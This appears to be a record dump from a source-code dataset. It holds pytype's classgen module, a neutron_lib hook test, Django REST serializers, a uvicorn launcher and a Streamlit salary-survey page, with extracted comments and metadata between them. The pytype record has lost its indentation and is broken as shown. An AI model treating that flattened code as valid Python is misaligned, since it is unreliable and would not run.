def is_dunder(name):
  """True for double-underscore names such as `__init__`."""
  has_prefix = name.startswith("__")
  has_suffix = name.endswith("__")
  return has_prefix and has_suffix
|
"""Base support for generating classes from data declarations.
Contains common functionality used by dataclasses, attrs and namedtuples.
"""
import abc
import collections
import logging
from pytype import abstract
from pytype import abstract_utils
from pytype import mixin
from pytype import overlay_utils
from pytype import special_builtins
import six
log = logging.getLogger(__name__)
# type alias for convenience
Param = overlay_utils.Param
class Ordering(object):
"""Possible orderings for Decorator.get_class_locals."""
# Order by each variable's first annotation. For example, for
# class Foo:
# x: int
# y: str
# x: float
# the locals will be [(x, Instance(float)), (y, Instance(str))]. Note that
# unannotated variables will be skipped, and the values of later annotations
# take precedence over earlier ones.
FIRST_ANNOTATE = object()
# Order by each variable's last definition. So for
# class Foo:
# x = 0
# y = 'hello'
# x = 4.2
# the locals will be [(y, Instance(str)), (x, Instance(float))]. Note that
# variables without assignments will be skipped.
LAST_ASSIGN = object()
class Attribute(object):
"""Represents a class member variable.
Members:
name: field name
typ: field python type
init: Whether the field should be included in the generated __init__
default: Default value
"""
def __init__(self, name, typ, init, default):
self.name = name
self.typ = typ
self.init = init
self.default = default
def __repr__(self):
return str({"name": self.name, "typ": self.typ, "init": self.init,
"default": self.default})
@six.add_metaclass(abc.ABCMeta)
class Decorator(abstract.PyTDFunction):
"""Base class for decorators that generate classes from data declarations."""
# Defaults for the args that we support (dataclasses only support 'init',
# but the others default to false so they should not affect anything).
_DEFAULT_ARGS = {
"init": True,
"kw_only": False,
"auto_attribs": False,
}
def __init__(self, *args, **kwargs):
super(Decorator, self).__init__(*args, **kwargs)
# Decorator.call() is invoked first with args, then with the class to
# decorate, so we need to first store the args and then associate them to
# the right class.
self._current_args = None
self.args = {} # map from each class we decorate to its args
@abc.abstractmethod
def decorate(self, node, cls):
"""Apply the decorator to cls."""
def update_kwargs(self, args):
self._current_args = Decorator._DEFAULT_ARGS.copy()
for k, v in args.namedargs.items():
if k in self._current_args:
try:
self._current_args[k] = abstract_utils.get_atomic_python_constant(v)
except abstract_utils.ConversionError:
self.vm.errorlog.not_supported_yet(
self.vm.frames, "Non-constant argument to decorator: %r" % k)
def init_name(self, attr):
"""Attribute name as an __init__ keyword, could differ from attr.name."""
return attr.name
def make_init(self, node, cls, attrs):
attr_params = []
for attr in attrs:
if attr.init:
# call self.init_name in case the name differs from the field name -
# e.g. attrs removes leading underscores from attrib names when
# generating kwargs for __init__.
attr_params.append(
Param(name=self.init_name(attr),
typ=attr.typ,
default=attr.default))
# The kw_only arg is ignored in python2; using it is not an error.
if self.args[cls]["kw_only"] and self.vm.PY3:
params = []
kwonly_params = attr_params
else:
params = attr_params
kwonly_params = []
return overlay_utils.make_method(self.vm, node, "__init__", params,
kwonly_params)
def type_clash_error(self, value):
if is_late_annotation(value):
err = value.expr
else:
err = value.data[0].cls
self.vm.errorlog.invalid_annotation(self.vm.frames, err)
def get_class_locals(self, cls, allow_methods, ordering):
"""Gets a dictionary of the class's local variables.
Args:
cls: An abstract.InterpreterClass.
allow_methods: A bool, whether to allow methods as variables.
ordering: A classgen.Ordering describing the order in which the variables
should appear.
Returns:
A collections.OrderedDict of the locals.
"""
# TODO(rechen): Once we drop Python 2 support, either use a normal dict or
# replace key deletion with OrderedDict.move_to_end().
out = collections.OrderedDict()
for op in self.vm.local_ops[cls.name]:
if is_dunder(op.name):
continue
local = self.vm.annotated_locals[cls.name][op.name]
if not allow_methods and is_method(local.orig):
continue
if ordering is Ordering.FIRST_ANNOTATE:
if not op.is_annotate() or op.name in out:
continue
else:
assert ordering is Ordering.LAST_ASSIGN
if not op.is_assign():
continue
elif op.name in out:
del out[op.name]
out[op.name] = local
return out
def add_member(self, node, cls, name, value, orig):
"""Adds a class member, returning whether it's a bare late annotation."""
if not is_late_annotation(value):
cls.members[name] = value
return False
elif orig is None:
# We are generating a class member from a bare annotation.
cls.members[name] = self.vm.convert.none.to_variable(node)
cls.late_annotations[name] = value
return True
else:
cls.members[name] = orig
return False
def get_base_class_attrs(self, cls, cls_attrs, metadata_key):
# Traverse the MRO and collect base class attributes. We only add an
# attribute if it hasn't been defined before.
base_attrs = []
taken_attr_names = {a.name for a in cls_attrs}
for base_cls in cls.mro[1:]:
if not isinstance(base_cls, mixin.Class):
continue
sub_attrs = base_cls.metadata.get(metadata_key, None)
if sub_attrs is None:
continue
for a in sub_attrs:
if a.name not in taken_attr_names:
taken_attr_names.add(a.name)
base_attrs.append(a)
return base_attrs
def call(self, node, func, args):
"""Construct a decorator, and call it on the class."""
self.match_args(node, args)
# There are two ways to use a decorator:
# @decorator(...)
# class Foo: ...
# or
# @decorator
# class Foo: ...
# In the first case, call() is invoked twice: once with kwargs to create the
# decorator object and once with the decorated class as a posarg. So we call
# update_kwargs on the first invocation, setting _current_args, and skip it
# on the second.
# In the second case, we call update_kwargs on the first and only
# invocation. (Although namedargs is empty in this case, bool(namedargs) is
# True as long as namedargs is an abstract.Dict object.)
if args.namedargs and not self._current_args:
self.update_kwargs(args)
# NOTE: @dataclass is py3-only and has explicitly kwonly args in its
# constructor.
#
# @attr.s does not take positional arguments in typical usage, but
# technically this works:
# class Foo:
# x = attr.ib()
# Foo = attr.s(Foo, **kwargs)
#
# Unfortunately, it also works to pass kwargs as posargs; we will at least
# reject posargs if the first arg is not a Callable.
if not args.posargs:
return node, self.to_variable(node)
cls_var = args.posargs[0]
# We should only have a single binding here
cls, = cls_var.data
if not isinstance(cls, mixin.Class):
# There are other valid types like abstract.Unsolvable that we don't need
# to do anything with.
return node, cls_var
self.args[cls] = self._current_args
# Reset _current_args so we don't use old args for a new class.
self._current_args = None
# decorate() modifies the cls object in place
self.decorate(node, cls)
return node, cls_var
class FieldConstructor(abstract.PyTDFunction):
"""Implements constructors for fields."""
def get_kwarg(self, args, name, default):
if name not in args.namedargs:
return default
try:
return abstract_utils.get_atomic_python_constant(args.namedargs[name])
except abstract_utils.ConversionError:
self.vm.errorlog.not_supported_yet(
self.vm.frames, "Non-constant argument %r" % name)
def get_type_from_default(self, node, default_var):
if default_var and default_var.data == [self.vm.convert.none]:
# A default of None doesn't give us any information about the actual type.
return self.vm.program.NewVariable([self.vm.convert.unsolvable],
[default_var.bindings[0]], node)
return default_var
def is_method(var):
if var is None or is_late_annotation(var):
return False
return isinstance(var.data[0], (
abstract.INTERPRETER_FUNCTION_TYPES,
special_builtins.ClassMethodInstance,
special_builtins.PropertyInstance,
special_builtins.StaticMethodInstance
))
def is_late_annotation(val):
return isinstance(val, abstract.LateAnnotation)
def is_dunder(name):
return name.startswith("__") and name.endswith("__")
|
en
| 0.828614
|
Base support for generating classes from data declarations. Contains common functionality used by dataclasses, attrs and namedtuples. # type alias for convenience Possible orderings for Decorator.get_class_locals. # Order by each variable's first annotation. For example, for # class Foo: # x: int # y: str # x: float # the locals will be [(x, Instance(float)), (y, Instance(str))]. Note that # unannotated variables will be skipped, and the values of later annotations # take precedence over earlier ones. # Order by each variable's last definition. So for # class Foo: # x = 0 # y = 'hello' # x = 4.2 # the locals will be [(y, Instance(str)), (x, Instance(float))]. Note that # variables without assignments will be skipped. Represents a class member variable. Members: name: field name typ: field python type init: Whether the field should be included in the generated __init__ default: Default value Base class for decorators that generate classes from data declarations. # Defaults for the args that we support (dataclasses only support 'init', # but the others default to false so they should not affect anything). # Decorator.call() is invoked first with args, then with the class to # decorate, so we need to first store the args and then associate them to # the right class. # map from each class we decorate to its args Apply the decorator to cls. Attribute name as an __init__ keyword, could differ from attr.name. # call self.init_name in case the name differs from the field name - # e.g. attrs removes leading underscores from attrib names when # generating kwargs for __init__. # The kw_only arg is ignored in python2; using it is not an error. Gets a dictionary of the class's local variables. Args: cls: An abstract.InterpreterClass. allow_methods: A bool, whether to allow methods as variables. ordering: A classgen.Ordering describing the order in which the variables should appear. Returns: A collections.OrderedDict of the locals. 
# TODO(rechen): Once we drop Python 2 support, either use a normal dict or # replace key deletion with OrderedDict.move_to_end(). Adds a class member, returning whether it's a bare late annotation. # We are generating a class member from a bare annotation. # Traverse the MRO and collect base class attributes. We only add an # attribute if it hasn't been defined before. Construct a decorator, and call it on the class. # There are two ways to use a decorator: # @decorator(...) # class Foo: ... # or # @decorator # class Foo: ... # In the first case, call() is invoked twice: once with kwargs to create the # decorator object and once with the decorated class as a posarg. So we call # update_kwargs on the first invocation, setting _current_args, and skip it # on the second. # In the second case, we call update_kwargs on the first and only # invocation. (Although namedargs is empty in this case, bool(namedargs) is # True as long as namedargs is an abstract.Dict object.) # NOTE: @dataclass is py3-only and has explicitly kwonly args in its # constructor. # # @attr.s does not take positional arguments in typical usage, but # technically this works: # class Foo: # x = attr.ib() # Foo = attr.s(Foo, **kwargs) # # Unfortunately, it also works to pass kwargs as posargs; we will at least # reject posargs if the first arg is not a Callable. # We should only have a single binding here # There are other valid types like abstract.Unsolvable that we don't need # to do anything with. # Reset _current_args so we don't use old args for a new class. # decorate() modifies the cls object in place Implements constructors for fields. # A default of None doesn't give us any information about the actual type.
| 3.029289
| 3
|
neutron_lib/tests/unit/db/test_model_query.py
|
rolaya/neutron-lib
| 0
|
6628137
|
<filename>neutron_lib/tests/unit/db/test_model_query.py
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron_lib.db import model_query
from neutron_lib import fixture
from neutron_lib.tests import _base
from neutron_lib.utils import helpers
# TODO(boden): find a way to test other model_query functions
class TestHooks(_base.BaseTestCase):
    """Tests for model_query hook registration and value retrieval."""

    def setUp(self):
        super(TestHooks, self).setUp()
        self.useFixture(fixture.DBQueryHooksFixture())

    def _mock_hook(self, x):
        return x

    def test_register_hook(self):
        fake_model = mock.Mock()
        model_query.register_hook(
            fake_model, 'hook1', self._mock_hook,
            self._mock_hook, result_filters=self._mock_hook)
        self.assertEqual(1, len(model_query._model_query_hooks.keys()))
        expected_ref = helpers.make_weak_ref(self._mock_hook)
        registered = model_query.get_hooks(fake_model)
        self.assertEqual(1, len(registered))
        # Every entry (query/filter/result_filters) should be a weak ref to
        # the same hook callable.
        for hook_dict in registered:
            for key in hook_dict.keys():
                self.assertEqual(expected_ref, hook_dict.get(key))

    def test_register_hook_non_callables(self):
        fake_model = mock.Mock()
        model_query.register_hook(
            fake_model, 'hook1', self._mock_hook, {}, result_filters={})
        self.assertEqual(1, len(model_query._model_query_hooks.keys()))
        expected_ref = helpers.make_weak_ref(self._mock_hook)
        registered = model_query.get_hooks(fake_model)
        self.assertEqual(1, len(registered))
        # Only the 'query' hook was a callable; the rest were plain dicts.
        for hook_dict in registered:
            for key in hook_dict.keys():
                if key == 'query':
                    self.assertEqual(expected_ref, hook_dict.get(key))
                else:
                    self.assertEqual({}, hook_dict.get(key))

    def test_get_values(self):
        fake_model = mock.Mock()
        fake_context = mock.Mock()
        with mock.patch.object(
                model_query, 'query_with_hooks') as query_with_hooks:
            query_with_hooks.return_value = [['value1'], ['value2']]
            values = model_query.get_values(fake_context, fake_model,
                                            'fake_field')
            self.assertEqual(['value1', 'value2'], values)
            query_with_hooks.assert_called_with(
                fake_context, fake_model, field='fake_field')
|
<filename>neutron_lib/tests/unit/db/test_model_query.py
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron_lib.db import model_query
from neutron_lib import fixture
from neutron_lib.tests import _base
from neutron_lib.utils import helpers
# TODO(boden): find a way to test other model_query functions
class TestHooks(_base.BaseTestCase):
def setUp(self):
super(TestHooks, self).setUp()
self.useFixture(fixture.DBQueryHooksFixture())
def _mock_hook(self, x):
return x
def test_register_hook(self):
mock_model = mock.Mock()
model_query.register_hook(
mock_model, 'hook1', self._mock_hook,
self._mock_hook, result_filters=self._mock_hook)
self.assertEqual(1, len(model_query._model_query_hooks.keys()))
hook_ref = helpers.make_weak_ref(self._mock_hook)
registered_hooks = model_query.get_hooks(mock_model)
self.assertEqual(1, len(registered_hooks))
for d in registered_hooks:
for k in d.keys():
self.assertEqual(hook_ref, d.get(k))
def test_register_hook_non_callables(self):
mock_model = mock.Mock()
model_query.register_hook(
mock_model, 'hook1', self._mock_hook, {}, result_filters={})
self.assertEqual(1, len(model_query._model_query_hooks.keys()))
hook_ref = helpers.make_weak_ref(self._mock_hook)
registered_hooks = model_query.get_hooks(mock_model)
self.assertEqual(1, len(registered_hooks))
for d in registered_hooks:
for k in d.keys():
if k == 'query':
self.assertEqual(hook_ref, d.get(k))
else:
self.assertEqual({}, d.get(k))
def test_get_values(self):
mock_model = mock.Mock()
mock_context = mock.Mock()
with mock.patch.object(
model_query, 'query_with_hooks') as query_with_hooks:
query_with_hooks.return_value = [['value1'], ['value2']]
values = model_query.get_values(mock_context, mock_model,
'fake_field')
self.assertEqual(['value1', 'value2'], values)
query_with_hooks.assert_called_with(
mock_context, mock_model, field='fake_field')
|
en
| 0.840918
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # TODO(boden): find a way to test other model_query functions
| 2.090712
| 2
|
go_and_do_people_info/serializers.py
|
capitalChurch/GoDoBackend
| 1
|
6628138
|
<filename>go_and_do_people_info/serializers.py<gh_stars>1-10
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group, User
from go_and_do_people_info.models import (Country, Event, Ministry, News,
Prayer, Ticket, UserProfile,
Volunteer)
from phonenumber_field import serializerfields
from rest_auth.registration.serializers import RegisterSerializer
from rest_framework import serializers
from rest_framework.validators import UniqueTogetherValidator
User = get_user_model()
class CustomRegisterSerializer(RegisterSerializer):
    """Registration serializer collecting email, password and full name."""
    email = serializers.EmailField(required=True)
    password1 = serializers.CharField(write_only=True)
    first_name = serializers.CharField(write_only=True)
    last_name = serializers.CharField(write_only=True)
    def get_cleaned_data(self):
        """Return the validated registration fields as a dict.

        NOTE(review): the result of super().get_cleaned_data() is discarded
        and 'username' is not included — confirm this is intentional for an
        email-only registration flow.
        """
        super(CustomRegisterSerializer, self).get_cleaned_data()
        return {
            'password1': self.validated_data.get('password1', ''),
            'email': self.validated_data.get('email', ''),
            'first_name': self.validated_data.get('first_name', ''),
            'last_name': self.validated_data.get('last_name', ''),
        }
class CustomUserDetailsSerializer(serializers.ModelSerializer):
    """Details serializer for the current user; email is read-only."""
    class Meta:
        model = User
        fields = ('email','first_name', 'last_name')
        read_only_fields = ('email',)
class UserSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing core Django user fields."""
    class Meta:
        model = get_user_model()
        fields = [
            'url',
            'first_name',
            'last_name',
            'email',
            'is_staff',
            'is_active',
            'groups',
        ]
class UserProfileSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer for a user's extended profile (contact,
    address and membership data)."""
    class Meta:
        model = UserProfile
        fields = [
            'url',
            'user',
            'date_of_birth',
            'gender',
            'phone_number',
            'mobile_number',
            'zip_code',
            'street',
            'district',
            'city',
            'state',
            'date_joined',
            'avatar',
        ]
class MinistrySerializer(serializers.ModelSerializer):
    """Serializer for Ministry records.

    NOTE(review): this is a plain ModelSerializer yet lists 'url' in fields,
    unlike the Hyperlinked serializers around it — confirm the Ministry model
    provides a 'url' attribute or whether HyperlinkedModelSerializer was meant.
    """
    class Meta:
        model = Ministry
        fields = ['url', 'name', 'info']
class VolunteerSerializer(serializers.HyperlinkedModelSerializer):
    """Links a member (user) to a ministry; each pair is unique."""
    member = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, read_only=False, help_text='Field documentation!')
    ministry = serializers.PrimaryKeyRelatedField(queryset=Ministry.objects.all(), many=False, read_only=False, help_text='Field documentation!')
    class Meta:
        model = Volunteer
        fields = ['url', 'member', 'ministry', 'is_leader']
        # A member may volunteer in a given ministry at most once.
        validators = [
            UniqueTogetherValidator(
                queryset=Volunteer.objects.all(),
                fields=['member', 'ministry']
            )
        ]
class CountrySerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer for Country records (name only)."""
    class Meta:
        model = Country
        fields = ['url', 'name']
class PrayerSerializer(serializers.HyperlinkedModelSerializer):
    """A user's prayer entry for a country at a given timestamp; duplicates rejected."""
    user = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, read_only=False, help_text='Field documentation!')
    country = serializers.PrimaryKeyRelatedField(queryset=Country.objects.all(), many=False, read_only=False, help_text='Field documentation!')
    class Meta:
        model = Prayer
        fields = ['url', 'timestamp', 'user', 'country']
        validators = [
            UniqueTogetherValidator(
                queryset=Prayer.objects.all(),
                fields=['timestamp', 'user', 'country']
            )
        ]
class NewsSerializer(serializers.HyperlinkedModelSerializer):
    """News article tied to an author and a country; exact duplicates rejected."""
    author = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, read_only=False, help_text='Field documentation!')
    country = serializers.PrimaryKeyRelatedField(queryset=Country.objects.all(), many=False, read_only=False, help_text='Field documentation!')
    class Meta:
        model = News
        fields = ['url', 'title', 'text', 'timestamp', 'author', 'country']
        validators = [
            UniqueTogetherValidator(
                queryset=News.objects.all(),
                fields=['title', 'text', 'timestamp', 'author', 'country']
            )
        ]
class EventSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer for scheduled events."""
    class Meta:
        model = Event
        fields = ['url', 'name', 'datetime', 'description', 'venue']
class TicketSerializer(serializers.HyperlinkedModelSerializer):
    """Event ticket owned by a user; (title, event, ticket_id) must be unique."""
    user = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, read_only=False, help_text='Field documentation!')
    event = serializers.PrimaryKeyRelatedField(queryset=Event.objects.all(), many=False, read_only=False, help_text='Field documentation!')
    class Meta:
        model = Ticket
        fields = ['url', 'title', 'user', 'event', 'ticket_id', 'purchase_date', 'modified', 'price']
        validators = [
            UniqueTogetherValidator(
                queryset=Ticket.objects.all(),
                fields=['title', 'event', 'ticket_id']
            )
        ]
|
<filename>go_and_do_people_info/serializers.py<gh_stars>1-10
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group, User
from go_and_do_people_info.models import (Country, Event, Ministry, News,
Prayer, Ticket, UserProfile,
Volunteer)
from phonenumber_field import serializerfields
from rest_auth.registration.serializers import RegisterSerializer
from rest_framework import serializers
from rest_framework.validators import UniqueTogetherValidator
User = get_user_model()  # rebind to the active user model (honours AUTH_USER_MODEL)
class CustomRegisterSerializer(RegisterSerializer):
    """Registration serializer collecting email, password and name fields."""
    email = serializers.EmailField(required=True)
    password1 = serializers.CharField(write_only=True)
    first_name = serializers.CharField(write_only=True)
    last_name = serializers.CharField(write_only=True)
    def get_cleaned_data(self):
        """Return the validated registration payload for the adapter.

        NOTE(review): the super() result is discarded and no 'username' key
        is returned -- presumably registration is email-only; confirm this
        matches the account adapter's expectations.
        """
        super(CustomRegisterSerializer, self).get_cleaned_data()
        return {
            'password1': self.validated_data.get('password1', ''),
            'email': self.validated_data.get('email', ''),
            'first_name': self.validated_data.get('first_name', ''),
            'last_name': self.validated_data.get('last_name', ''),
        }
class CustomUserDetailsSerializer(serializers.ModelSerializer):
    """Details serializer for the logged-in user; email cannot be changed."""
    class Meta:
        model = User
        fields = ('email','first_name', 'last_name')
        read_only_fields = ('email',)
class UserSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer exposing core account fields of the user model."""
    class Meta:
        model = get_user_model()
        fields = [
            'url',
            'first_name',
            'last_name',
            'email',
            'is_staff',
            'is_active',
            'groups',
        ]
class UserProfileSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer for a user's extended profile (contact + address)."""
    class Meta:
        model = UserProfile
        fields = [
            'url',
            'user',
            'date_of_birth',
            'gender',
            'phone_number',
            'mobile_number',
            'zip_code',
            'street',
            'district',
            'city',
            'state',
            'date_joined',
            'avatar',
        ]
class MinistrySerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer for Ministry records.

    Consistency fix: every other serializer in this module subclasses
    HyperlinkedModelSerializer, and this one declares a 'url' entry in
    ``fields``; using the hyperlinked base makes the 'url' handling uniform.
    The remaining fields are plain model fields, so output is unchanged.
    """
    class Meta:
        model = Ministry
        fields = ['url', 'name', 'info']
class VolunteerSerializer(serializers.HyperlinkedModelSerializer):
    """Links a user to a ministry; at most one record per (member, ministry)."""
    member = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, read_only=False, help_text='Field documentation!')
    ministry = serializers.PrimaryKeyRelatedField(queryset=Ministry.objects.all(), many=False, read_only=False, help_text='Field documentation!')
    class Meta:
        model = Volunteer
        fields = ['url', 'member', 'ministry', 'is_leader']
        # Reject duplicate memberships at the API layer.
        validators = [
            UniqueTogetherValidator(
                queryset=Volunteer.objects.all(),
                fields=['member', 'ministry']
            )
        ]
class CountrySerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer for Country records (name only)."""
    class Meta:
        model = Country
        fields = ['url', 'name']
class PrayerSerializer(serializers.HyperlinkedModelSerializer):
    """A user's prayer entry for a country at a given timestamp; duplicates rejected."""
    user = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, read_only=False, help_text='Field documentation!')
    country = serializers.PrimaryKeyRelatedField(queryset=Country.objects.all(), many=False, read_only=False, help_text='Field documentation!')
    class Meta:
        model = Prayer
        fields = ['url', 'timestamp', 'user', 'country']
        validators = [
            UniqueTogetherValidator(
                queryset=Prayer.objects.all(),
                fields=['timestamp', 'user', 'country']
            )
        ]
class NewsSerializer(serializers.HyperlinkedModelSerializer):
    """News article tied to an author and a country; exact duplicates rejected."""
    author = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, read_only=False, help_text='Field documentation!')
    country = serializers.PrimaryKeyRelatedField(queryset=Country.objects.all(), many=False, read_only=False, help_text='Field documentation!')
    class Meta:
        model = News
        fields = ['url', 'title', 'text', 'timestamp', 'author', 'country']
        validators = [
            UniqueTogetherValidator(
                queryset=News.objects.all(),
                fields=['title', 'text', 'timestamp', 'author', 'country']
            )
        ]
class EventSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer for scheduled events."""
    class Meta:
        model = Event
        fields = ['url', 'name', 'datetime', 'description', 'venue']
class TicketSerializer(serializers.HyperlinkedModelSerializer):
    """Event ticket owned by a user; (title, event, ticket_id) must be unique."""
    user = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, read_only=False, help_text='Field documentation!')
    event = serializers.PrimaryKeyRelatedField(queryset=Event.objects.all(), many=False, read_only=False, help_text='Field documentation!')
    class Meta:
        model = Ticket
        fields = ['url', 'title', 'user', 'event', 'ticket_id', 'purchase_date', 'modified', 'price']
        validators = [
            UniqueTogetherValidator(
                queryset=Ticket.objects.all(),
                fields=['title', 'event', 'ticket_id']
            )
        ]
|
none
| 1
| 2.156624
| 2
|
|
main.py
|
ranking-agent/aragorn
| 1
|
6628139
|
#!/usr/bin/env python
# from gunicorn.app.wsgiapp import WSGIApplication
#
# # --bind 0.0.0.0:8080 -w 1 -k uvicorn.workers.UvicornWorker -t 600 src.server:APP
# app = WSGIApplication()
#
# app.run()
import uvicorn
class App:
    """Placeholder object; the ASGI app actually served is 'src.server:APP'."""
    ...
app = App()  # NOTE(review): unused by uvicorn.run below -- presumably kept for tooling; confirm.
if __name__ == "__main__":
    # Serve the ASGI application from src/server.py on localhost:5000,
    # with logging configured from the YAML file.
    uvicorn.run("src.server:APP", host="127.0.0.1", port=5000, log_level="info", log_config="logging_setup.yml")
|
#!/usr/bin/env python
# from gunicorn.app.wsgiapp import WSGIApplication
#
# # --bind 0.0.0.0:8080 -w 1 -k uvicorn.workers.UvicornWorker -t 600 src.server:APP
# app = WSGIApplication()
#
# app.run()
import uvicorn
class App:
    """Placeholder object; the ASGI app actually served is 'src.server:APP'."""
    ...
app = App()  # NOTE(review): unused by uvicorn.run below -- presumably kept for tooling; confirm.
if __name__ == "__main__":
    # Serve the ASGI application from src/server.py on localhost:5000,
    # with logging configured from the YAML file.
    uvicorn.run("src.server:APP", host="127.0.0.1", port=5000, log_level="info", log_config="logging_setup.yml")
|
en
| 0.22995
|
#!/usr/bin/env python # from gunicorn.app.wsgiapp import WSGIApplication # # # --bind 0.0.0.0:8080 -w 1 -k uvicorn.workers.UvicornWorker -t 600 src.server:APP # app = WSGIApplication() # # app.run()
| 2.18293
| 2
|
explore_page.py
|
Oreoluwa1234/Salary-Prediction-Project
| 0
|
6628140
|
import streamlit as st
import pandas as pd
import matplotlib.pyplot as plt
def shorten_categories(categories, cutoff):
    """Map each category label to itself when its count reaches ``cutoff``,
    otherwise to the bucket label 'Other'.

    ``categories`` is expected to be a pandas Series such as the result of
    ``Series.value_counts()`` (labels in the index, counts in the values).
    """
    return {
        label: (label if count >= cutoff else 'Other')
        for label, count in categories.items()
    }
def clean_experience(x):
    """Convert a YearsCodePro survey answer into a numeric year count.

    The two open-ended answers are clamped to 50 and 0.5; everything else
    is parsed as a float.
    """
    sentinel_years = {'More than 50 years': 50, 'Less than 1 year': 0.5}
    if x in sentinel_years:
        return sentinel_years[x]
    return float(x)
def clean_education(x):
    """Collapse an EdLevel survey answer into one of four buckets.

    Checked in order: Bachelor's, Master's, then professional/doctoral
    degrees ('Post grad'); anything else is 'Less than a bachelor'.
    """
    for keep in ('Bachelor’s degree', 'Master’s degree'):
        if keep in x:
            return keep
    if 'Professional degree' in x or 'Other doctoral degree' in x:
        return 'Post grad'
    return 'Less than a bachelor'
@st.cache
def load_data():
    """Load and clean the Stack Overflow survey data used by this page.

    Returns a DataFrame with columns Country (rare countries bucketed into
    'Other'), EdLevel (bucketed), YearsCodePro (numeric) and Salary,
    restricted to salaries in [10000, 250000]. Cached by Streamlit.
    """
    survey=pd.read_csv('survey_results_public.zip' ,compression='zip', header=0, sep=',', quotechar='"')
    survey=survey[['Country','EdLevel','YearsCodePro','Employment','ConvertedComp']]
    survey=survey.rename({'ConvertedComp':'Salary'},axis=1)
    survey=survey[survey['Salary'].notnull()]
    survey=survey.dropna()
    survey=survey.drop('Employment',axis=1)
    # Bucket countries with fewer than 400 responses into 'Other'.
    country_map=shorten_categories(survey.Country.value_counts(),400)
    survey['Country']=survey['Country'].map(country_map)
    survey=survey[survey['Salary'] <=250000]
    survey=survey[survey['Salary'] >=10000]
    # NOTE(review): Salary is numeric at this point, so comparing it to the
    # string 'Others' never filters any row -- confirm the original intent.
    survey=survey[survey['Salary'] !='Others']
    survey['YearsCodePro']= survey['YearsCodePro'].apply(clean_experience)
    survey['EdLevel']= survey['EdLevel'].apply(clean_education)
    return survey
survey=load_data()  # module-level dataset shared by the page-rendering functions
def show_explore_page():
    """Render the Streamlit 'explore' page: a country pie chart plus
    mean-salary bar/line charts, computed from the module-level ``survey``."""
    st.title("Data Scientist Salary prediction")
    st.write("""
### Stack Overflow Developer Survey 2022
# """
    )
    data=survey['Country'].value_counts()
    fig1,ax1=plt.subplots()
    ax1.pie(data,labels=data.index,shadow=True,startangle=90)
    # Bug fix: the original did `ax1.axis=('equal')`, which *assigns over*
    # the Axes.axis method instead of calling it. Call it so the pie is
    # drawn with an equal aspect ratio (a circle).
    ax1.axis('equal')
    st.write("""#### Number of Data from different countries""")
    st.pyplot(fig1)
    st.write(
        """
#### Mean Salary based on country
"""
    )
    data=survey.groupby(['Country']) ["Salary"].mean().sort_values(ascending=True)
    st.bar_chart(data)
    st.write(
        """
#### Mean Salary Based on Experience
"""
    )
    data=survey.groupby(['YearsCodePro'])['Salary'].mean().sort_values(ascending=True)
    st.line_chart(data)
|
import streamlit as st
import pandas as pd
import matplotlib.pyplot as plt
def shorten_categories(categories, cutoff):
    """Map each category label to itself when its count reaches ``cutoff``,
    otherwise to the bucket label 'Other'.

    ``categories`` is expected to be a pandas Series such as the result of
    ``Series.value_counts()`` (labels in the index, counts in the values).
    """
    return {
        label: (label if count >= cutoff else 'Other')
        for label, count in categories.items()
    }
def clean_experience(x):
    """Convert a YearsCodePro survey answer into a numeric year count.

    The two open-ended answers are clamped to 50 and 0.5; everything else
    is parsed as a float.
    """
    sentinel_years = {'More than 50 years': 50, 'Less than 1 year': 0.5}
    if x in sentinel_years:
        return sentinel_years[x]
    return float(x)
def clean_education(x):
    """Collapse an EdLevel survey answer into one of four buckets.

    Checked in order: Bachelor's, Master's, then professional/doctoral
    degrees ('Post grad'); anything else is 'Less than a bachelor'.
    """
    for keep in ('Bachelor’s degree', 'Master’s degree'):
        if keep in x:
            return keep
    if 'Professional degree' in x or 'Other doctoral degree' in x:
        return 'Post grad'
    return 'Less than a bachelor'
@st.cache
def load_data():
    """Load and clean the Stack Overflow survey data used by this page.

    Returns a DataFrame with columns Country (rare countries bucketed into
    'Other'), EdLevel (bucketed), YearsCodePro (numeric) and Salary,
    restricted to salaries in [10000, 250000]. Cached by Streamlit.
    """
    survey=pd.read_csv('survey_results_public.zip' ,compression='zip', header=0, sep=',', quotechar='"')
    survey=survey[['Country','EdLevel','YearsCodePro','Employment','ConvertedComp']]
